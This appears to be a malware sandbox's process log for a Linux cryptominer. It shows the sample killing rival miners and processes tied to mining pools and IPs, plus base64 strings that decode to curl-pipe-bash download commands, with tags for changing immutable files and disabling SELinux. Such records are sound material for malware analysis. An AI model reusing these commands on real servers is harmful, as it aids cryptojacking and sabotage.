/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep kdevtmpfsi2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kinsing2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep redis22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep sync_supers2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep sustse2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grep
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
- Disables SELinux
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep kieuanilam.me2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 15843⤵
-
-
/usr/local/bin/killkill -9 15843⤵
-
-
/usr/sbin/killkill -9 15843⤵
-
-
/usr/bin/killkill -9 15843⤵
-
-
/sbin/killkill -9 15843⤵
-
-
/bin/killkill -9 15843⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 15893⤵
-
-
/usr/local/bin/killkill -9 15893⤵
-
-
/usr/sbin/killkill -9 15893⤵
-
-
/usr/bin/killkill -9 15893⤵
-
-
/sbin/killkill -9 15893⤵
-
-
/bin/killkill -9 15893⤵
-
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./A7mA5gb2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kacpi_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kswap_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kauditd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kpsmoused_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kseriod_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kthreadd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ksoftirqd_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kintegrityd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jawa2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f oracle.jpg2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 188.209.49.542⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 181.214.87.2412⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f servim2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kblockd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f native_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ynn2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 65ccEJ72⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f jmxx2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 2Ne80nA2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f sysstats2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f systemxlv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f OIcJi1m2⤵
-
-
/usr/bin/pkillpkill -f biosetjenkins2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f Loopback2⤵
-
-
/usr/bin/pkillpkill -f apaceha2⤵
-
-
/usr/bin/pkillpkill -f mixnerdx2⤵
-
-
/usr/bin/pkillpkill -f performedl2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f JnKihGjn2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f irqba2anc12⤵
-
-
/usr/bin/pkillpkill -f irqba5xnc12⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f irqbnc12⤵
-
-
/usr/bin/pkillpkill -f ir29xc12⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f conns2⤵
-
-
/usr/bin/pkillpkill -f irqbalance2⤵
-
-
/usr/bin/pkillpkill -f XJnRj2⤵
-
-
/usr/bin/pkillpkill -f mgwsl2⤵
-
-
/usr/bin/pkillpkill -f pythno2⤵
-
-
/usr/bin/pkillpkill -f jweri2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f lx262⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f NXLAi2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f BI5zj2⤵
-
-
/usr/bin/pkillpkill -f askdljlqw2⤵
-
-
/usr/bin/pkillpkill -f minerd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f minergate2⤵
-
-
/usr/bin/pkillpkill -f Guard.sh2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f ysaydh2⤵
-
-
/usr/bin/pkillpkill -f bonns2⤵
-
-
/usr/bin/pkillpkill -f donns2⤵
-
-
/usr/bin/pkillpkill -f kxjd2⤵
-
-
/usr/bin/pkillpkill -f Duck.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f bonn.sh2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f conn.sh2⤵
-
-
/usr/bin/pkillpkill -f kworker342⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f kw.sh2⤵
-
-
/usr/bin/pkillpkill -f pro.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f polkitd2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f acpid2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f icb5o2⤵
-
-
/usr/bin/pkillpkill -f nopxi2⤵
-
-
/usr/bin/pkillpkill -f irqbalanc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f minerd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f i5862⤵
-
-
/usr/bin/pkillpkill -f gddr2⤵
-
-
/usr/bin/pkillpkill -f mstxmr2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f ddg.20112⤵
-
-
/usr/bin/pkillpkill -f wnTKYg2⤵
-
-
/usr/bin/pkillpkill -f deamon2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f disk_genius2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f sourplum2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f nanoWatch2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f zigw2⤵
-
-
/usr/bin/pkillpkill -f devtool2⤵
-
-
/usr/bin/pkillpkill -f devtools2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f systemctI2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f watchbog2⤵
-
-
/usr/bin/pkillpkill -f sustes2⤵
-
-
/usr/bin/pkillpkill -f xmrig2⤵
-
-
/usr/bin/pkillpkill -f xmrig-cpu2⤵
-
-
/usr/bin/pkillpkill -f 121.42.151.1372⤵
-
-
/usr/bin/pkillpkill -f init12.cfg2⤵
-
-
/usr/bin/pkillpkill -f nginxk2⤵
-
-
/usr/bin/pkillpkill -f tmp/wc.conf2⤵
-
-
/usr/bin/pkillpkill -f xmrig-notls2⤵
-
-
/usr/bin/pkillpkill -f xmr-stak2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f suppoie2⤵
-
-
/usr/bin/pkillpkill -f zer0day.ru2⤵
-
-
/usr/bin/pkillpkill -f dbus-daemon--system2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f nullcrew2⤵
-
-
/usr/bin/pkillpkill -f systemctI2⤵
-
-
